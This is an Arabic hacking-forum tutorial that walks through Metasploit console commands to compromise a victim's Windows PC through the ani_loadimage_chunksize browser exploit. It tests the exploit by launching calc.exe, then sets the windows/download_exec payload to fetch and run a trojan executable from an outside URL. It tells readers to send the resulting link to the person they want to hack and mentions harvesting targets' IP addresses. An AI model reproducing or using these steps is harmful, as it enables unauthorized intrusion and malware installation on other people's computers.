][شرح]m e a t sploit.وكيف الاختراق فيه.وإ.وماهي الاوامر التي تكتب

لسلام عليكم ورحمة الله وبركاته

بسم الله نبدأ





:: ---نبذه--- ::

كما تعرفون اصبحت ثغرات المتصفح قليله في وقتنا الحالي ...
وصعوبة البحث من قبل الهكر ذو المستوى البسيط عن اكتشاف ثغرات جديده بنفسه ...
فقاموا بعمل مشروع يساعد المبرمجين (الهكر) ع اكتشاف الثغرات بجميع انواعها ...
من خلال هذا البرنامج سوف تصبح محترف بأذن الله ..



::--وظيفة البرنامج --::


البرنامج يقوم بجمع جميع الثغرات المنزله من قبل مواقع السيكورتي والمواقع الاخرى بطريقه مبسطه وسهولة التعرف ع نوع الثغره واشياء اخرى سوف نتطرق لها ...
البرنامج مزورد ببرامج تساعد لاأختراق المواقع مثل برنامج النت كات وبرنامج ترجمة ثغرات الروبي وغيرها (يعني عده كامله )


::-- طريقة استعمال البرنامج --::


اول حاجه في مسطلحات الي راح نستخدمها :-

:.:.:..اوامر الاستخدام :.:.:. Command


show <==== أعرض
set <==== أختار
use <==== استخدم
unset <==== تراجع
cmd <==== تنفيذ امر


--------------------------------------------------------------------


:.:.:.. اوامر خيارات الثغره :.:.:..

payload <==== هذا الامر مهم .. هذا البايلود وظعوه بالبرنامج يعطيك خيارات بالثغره يسألك يقولك س\ كيف تريد ان تتصل بالثغره وماذا تريد ان تعمل بها ..؟؟ عاد هو يعطيك خيارات كثار راح نشوفها بعد شوي ..


Options <==== هذا امر يعرض لك خيارات الثغره بعد التعديل ومواصفات الثغره والانظمه التي تشتغل عليها الثغره مثل ( xp , liunx ) ويختلف تمام عن الامر السابق لحد يلخبط


--------------------------------------------------------------------


:.:.:.. طريقة الاستعمال وكيفية الاختراق..:.:.:.:


طيب بعد ما تحمل البرنامج سويله تحديث (update) عشان تحمل عليه آخر الثغرات اللي نزلت





وبعد ما تسوي التحديث إفتح البرنامج

بدأ ====>> كافة البرامج =====>> ****sploit ====>> ا****sploit 3 ***


وانتظر بعدها وإظغط على console







وتجينا الواجه الي نطبق عليها الشرح









الآن أكتب الآمر التالي

show exploits



وحتجينا جميع الثغرات



ثغرات المتصفح تبدأ بـ---->> windows/browser

طيب انا حشرح اخر ثغرة نزلت اللي هيا ثغرة ani_loadimage_chunksize

اكتب الآمر التالي لإستخدامها

use windows/browser/ani_loadimage_chunksize

الآن نستخدم بايلود وقلنا ان البايلود وظيفته يسألك بعد ماتختار الثغره يقولك ماذا تريد ان تعمل في الثغره ..( يعني تبي تتصل فيها اتصال مباشر bind ولا اتصال عكسي reverseالخ....)
البرنامج فيه بايلودات كثيره نختار اللي يناسبنا

هذا امر من اوامر البايلود بشرحلكم وضيفته windows/download_exec

هذا امر لنظام وندوز يقوم بتحميل واستخراج صيغة exe وهو الي راح نستخدمه بالاختراق


اكتب الآمر التالي لعرض جميع البايلودات

show payloads




طيب الآن نسوي تجربه
ونستخدم بايلود لكتابة الآوامر
ونكتب فيه الآمر calc.exe
وهو آمر لتشغيل الآلة الحاسبة
ونجربه على نفسنا ونشوف هل الآلة الحاسبة تشتغل ؟
اذا كانت تشتغل يعني الثغرة شغالة 100%


اكتب الآوامر التالية

set payload windows/exec

هذا الآمر لإستخدام بايلود كتابة الآوامر

set cmd calc.exe

وهذا الآمر لجعله يشغل الآلة الحاسبة

نكتب بعد كذا امر لتحديد اي بي الشخص المستهدف وانت لازم تجيبه بأي طريقه ... استخدم سكربت ipget للماسنجر وغيرها طرق مانبي نتطرق للامر .... طبعا انت بالامر هذا بدا الاكس الموجود تحط الاي بي حقك عشان تجرب ع نفسك .. الثغره وتشوف هي شغاله ولا لا


set payloads SRVHOST xxx.xxx.xxx.xxx

واكتب exploit لبدأ الثغرة




مثل مانتو ملاحظين البرنامج اعطانا رابط

انسخ الرابط والصقه في المتصفح

وحتشتغل الآلة الحاسبة في جهازك




طيب هذا يعني الثغرة شغالة 100%


طيب الآن نغير البايلود ونستخدم بايلود لتنزيل الباتش

اكتب الآوامر التآلية

unset payload

وهو الآمر للتراجع عن استخدام البايلود

set payload windows/download_exec

آمر لإستخدام بايلود لتنزيل الباتش في جهاز الضحية

set url http://feezo.com/server.exe

مع استبدال رابط سيرفرك


واكتب exploit لبدأ الثغرة



مثل ما إنتو شايفين في الصورة البرنامج اعطانا رابط

الرابط هذا اعطيه للي تبي تخترق جهازه

وانتهينا...اتمنا فهمتو الشششرح.......][تح ـيـآتي][~|